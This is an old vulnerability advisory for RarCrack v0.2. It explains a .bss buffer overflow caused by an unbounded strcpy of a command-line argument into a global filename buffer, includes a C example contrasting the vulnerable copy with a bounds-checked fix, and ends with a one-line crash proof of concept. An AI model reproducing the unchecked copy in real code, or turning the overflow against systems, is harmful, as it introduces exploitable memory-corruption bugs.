# Title : RarCrack v0.2 "filename" init() .bss PoC
# Published : 2010-09-20
# Author : Stoke
The software can be downloaded here: http://rarcrack.sourceforge.net/
# Author: stoke
# Date: 2010-09-20
# Download: http://rarcrack.sourceforge.net/
# Tested on: Backtrack 4
#############################
Site: http://devilcode.it | http://hack2web.altervista.org
Special greetz to: nex, for reassuring me when I said "WHY EIP IT'S NOT CHANGED!!!!!!!?!!!"
Crew Members: bl3ck, stoke, Shellcoder_, n1md4, sys.x4sh, Ax3L, s1y, LostPassword, nex & overmind
############################
RarCrack v0.2 bss overflow PoC
###########################################
Function affected: init();
Type: local;
Variable overflowed: filename;
###########################################
########################################################
Here we have:
----- Start useful code snip --------
char filename[255];
----- End useful code snip ----------
This variable is declared above the "main" function, so it is global and, being uninitialized, it is allocated in .bss.
In init() function we have:
---- Start useful code snip ----
    if (strcmp(argv[i],"--help") == 0) {
        printf("Usage: rarcrack encrypted_archive.ext [--threads NUM] [--type rar|zip|7z]\n\n");
        printf("Options: --help: show this screen.\n");
        printf(" --type: you can specify the archive program, this needed when\n");
        printf(" the program couldn't detect the proper file type\n");
        printf(" --threads: you can specify how many threads\n");
        printf(" will be run, maximum 12 (default: 2)\n\n");
        printf("Info: This program supports only RAR, ZIP and 7Z encrypted archives.\n");
        printf(" RarCrack! usually detects the archive type.\n\n");
        help = 1;
        break;
    } else if (strcmp(argv[i],"--threads") == 0) {
        if ((i + 1) < argc) {
            sscanf(argv[++i], "%d", &threads);
            if (threads < 1) threads = 1;
            if (threads > 12) {
                printf("INFO: number of threads adjusted to 12\n");
                threads = 12;
            }
        } else {
            printf("ERROR: missing parameter for option: --threads!\n");
            help = 1;
        }
    } else if (strcmp(argv[i],"--type") == 0) {
        if ((i + 1) < argc) {
            sscanf(argv[++i], "%s", &test);
            for (j = 0; strcmp(TYPE[j], "") != 0; j++) {
                if (strcmp(TYPE[j], test) == 0) {
                    strcpy(finalcmd, CMD[j]);
                    archive_type = j;
                    break;
                }
            }
            if (archive_type < 0) {
                printf("WARNING: invalid parameter --type %s!\n", argv[i]);
                finalcmd[0] = ' ';
            }
        } else {
            printf("ERROR: missing parameter for option: --type!\n");
            help = 1;
        }
    } else {
        /* no length check: an argv[i] longer than sizeof(filename) overflows into .bss */
        strcpy((char*)&filename, argv[i]);
---- Stop useful code snip ----
As you can see, at the end of this code there is a strcpy into our "filename" variable with no length check, so if you pass more than 255 bytes in a single argv element the copy runs past the buffer in .bss and you get a Segmentation Fault.
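To make the fix concrete, here is an added example (not RarCrack's code) that reproduces the same layout, a global filename[255] in .bss, and puts the unchecked strcpy() next to a bounds-checked replacement; set_filename_checked() and make_arg() are hypothetical helper names, and the 500-byte argument mirrors the PoC below.

```c
#include <stdio.h>
#include <string.h>

/* Same layout as the advisory: an uninitialized global buffer lives in .bss. */
char filename[255];

/* Vulnerable pattern from the init() snippet: strcpy() has no bound, so any
 * argument longer than sizeof(filename) - 1 writes past the buffer. */
void set_filename_unchecked(const char *arg)
{
    strcpy(filename, arg);
}

/* Hardened replacement (hypothetical, not the project's code): find the NUL
 * within the buffer size before copying, so the terminator always fits.
 * Returns 0 on success, -1 when the argument is too long. */
int set_filename_checked(const char *arg)
{
    const char *nul = memchr(arg, '\0', sizeof(filename));
    if (nul == NULL) {              /* no terminator in the first 255 bytes */
        filename[0] = '\0';
        return -1;
    }
    size_t len = (size_t)(nul - arg);
    memcpy(filename, arg, len + 1); /* len + 1 copies the terminator too */
    return 0;
}

/* Test helper: build a constructed argument of n 'A' bytes, like the PoC's
 * perl -e 'print "A" x500'. Returns a pointer to a static buffer. */
const char *make_arg(size_t n)
{
    static char buf[1024];
    if (n >= sizeof(buf)) n = sizeof(buf) - 1;
    memset(buf, 'A', n);
    buf[n] = '\0';
    return buf;
}

int main(int argc, char **argv)
{
    const char *arg = argc > 1 ? argv[1] : make_arg(500);
    if (set_filename_checked(arg) != 0) {
        fprintf(stderr, "ERROR: file name longer than %zu bytes\n",
                sizeof(filename) - 1);
        return 1;
    }
    printf("filename = %s\n", filename);
    return 0;
}
```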
###########################################################################
###########################################################################
PoC
./rarcrack `perl -e 'print "A" x500'`
###########################################################################